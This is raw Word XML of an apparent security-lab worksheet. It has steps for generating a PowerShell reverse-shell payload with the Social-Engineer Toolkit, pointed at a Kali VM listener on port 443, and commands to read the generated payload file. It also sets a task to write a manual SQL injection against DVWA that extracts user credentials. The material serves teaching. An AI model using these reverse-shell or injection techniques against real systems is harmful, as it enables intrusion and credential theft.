    <w:p w14:paraId="7BE43EB6" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:after="1"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E46B96F" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="307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7D0B8A80" wp14:editId="3ECD452A">
            <wp:extent cx="5771511" cy="1557527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511" cy="155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D81F" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="502"/>
        </w:tabs>
        <w:spacing w:before="147"/>
        <w:ind w:left="502" w:hanging="196"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Enter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IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-22"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>for the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>reverse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host: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.0.105 (IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2426C1" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="502"/>
        </w:tabs>
        <w:spacing w:before="43"/>
        <w:ind w:left="502" w:hanging="196"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Enter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port for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>listener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[443]: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(Unused </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEF9FF2" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="002D34AF">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="1133" w:bottom="280" w:left="1417" w:header="717" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02D7B4A0" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="80"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>generated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reverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>script and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>saved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rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283909F6" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/root/.set/reports/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/powershell.reverse.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3FDFD0" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="163"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:t>Access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Generated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4079F6F2" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/root/.set/reports/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/powershell.reverse.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2203673A" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="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7568" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63E32F0D" wp14:editId="1D90FAEA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>104115</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5265780" cy="5562600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78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9BD038" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="163"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:t>Extract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 xml:space="preserve">18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Characters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8FDE5E" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>head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-c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 xml:space="preserve">18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/root/.set/reports/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/powershell.reverse.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5296E3" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="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8080" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5DF699C7" wp14:editId="58765F07">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>103915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4480560" cy="472439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72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735B08" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="170" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="4748"/>
      </w:pPr>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>characters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 xml:space="preserve">are: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>function cleanup {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78781034" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:sectPr w:rsidR="002D34AF">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="1133" w:bottom="280" w:left="1417" w:header="717" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311293FA" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="306"/>
        </w:tabs>
        <w:spacing w:before="80" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="612"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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Kali,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>browse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http:/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Metasploit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8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IP]/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dvwa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log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with:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Username:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>admin Password: password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C3A5AE" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB7BF1A" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="274"/>
      </w:pPr>
      <w:r>
        <w:t>Important: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menu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left,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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"DVWA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Security"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change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level to "low".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102B3FCF" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="274"/>
      </w:pP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"Select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Injection"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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DVWA,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>injection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the username, password, first name, and last name of users in the "users" table. What SQL injection query did you create?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663BA93C" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="5851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Explain the query in details. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>You</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLMAP. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>[20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D8561D" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B6C5EEB" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="9079"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDEBF3"/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDEBF3"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="278222AE" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4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5028736C" wp14:editId="3AE0D4F2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1094739</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>105402</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4679950" cy="5888990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79950" cy="5888990"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4679950" cy="5888990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138" y="0"/>
                            <a:ext cx="2303414" cy="20434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71141"/>
                            <a:ext cx="4679823" cy="38176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41928E" id="Group 34" o:spid="_x0000_s1026" style="position:absolute;margin-left:86.2pt;margin-top:8.3pt;width:368.5pt;height:463.7pt;z-index:-15717888;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="46799,588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RN0JkAgAAJAcAAA4AAABkcnMvZTJvRG9jLnhtbNRVyW7bMBC9F+g/&#10;ELzHWr0JlnNxYwQIWqPLB9AUJRERF5D09vcdUopj2AVSBC3QHkQMRc7wzZvH4eL+KDq0Z8ZyJUuc&#10;jGKMmKSq4rIp8Y/vD3czjKwjsiKdkqzEJ2bx/fLjh8VBFyxVreoqZhAEkbY46BK3zukiiixtmSB2&#10;pDSTsFgrI4iDqWmiypADRBddlMbxJDooU2mjKLMW/q76RbwM8euaUfelri1zqCsxYHNhNGHc+jFa&#10;LkjRGKJbTgcY5B0oBOESDj2HWhFH0M7wm1CCU6Osqt2IKhGpuuaUhRwgmyS+ymZt1E6HXJri0Ogz&#10;TUDtFU/vDks/79dGf9Mb06MH80nRZwu8RAfdFJfrft68bj7WRngnSAIdA6OnM6Ps6BCFn/lkOp+P&#10;gXgKa+PZbDafD5zTFgpz40fbT294RqToDw7wznA0pwV8A0Vg3VD0tpTAy+0Mw0MQ8VsxBDHPO30H&#10;1dTE8S3vuDsFZULdPCi533Dq2fUTYHNjEK9KnI0xkkTAjXgUpGEI5kD5yx7v4StwE2Dbcf3Au87z&#10;7u0BKgj6ShC/yLYX20rRnWDS9bfHsA5QK2lbri1GpmBiywCeeawSKBrcXAcQteHS9VfFOsMcbf35&#10;NeD4ChfMAyXFeSGAfsXpU7CDvK4UkyaTJIP+cCubNIuzPMl72aRxnuVZkM25+KTQxro1UwJ5AwAD&#10;EGCcFGT/ZAdIL1sGInsUAR6A6skG4/+RzORKMpN/TTLpX5cMdBJQSxpPkyRPekVetppZmvWayWbJ&#10;dJL+ec2EpgOtOEh+eDZ8r7+cg335uC1/AgAA//8DAFBLAwQKAAAAAAAAACEAMJAzKUJBAABCQQAA&#10;FQAAAGRycy9tZWRpYS9pbWFnZTEuanBlZ//Y/+AAEEpGSUYAAQEBAGAAYAAA/9sAQwADAgIDAgID&#10;AwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU&#10;/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQU/8AAEQgBSwF1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oooAKKKKACiiigAooooAKKKKACiiigAooooAKKK&#10;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&#10;0TVLlbay1iwu7hslYoLpHc4G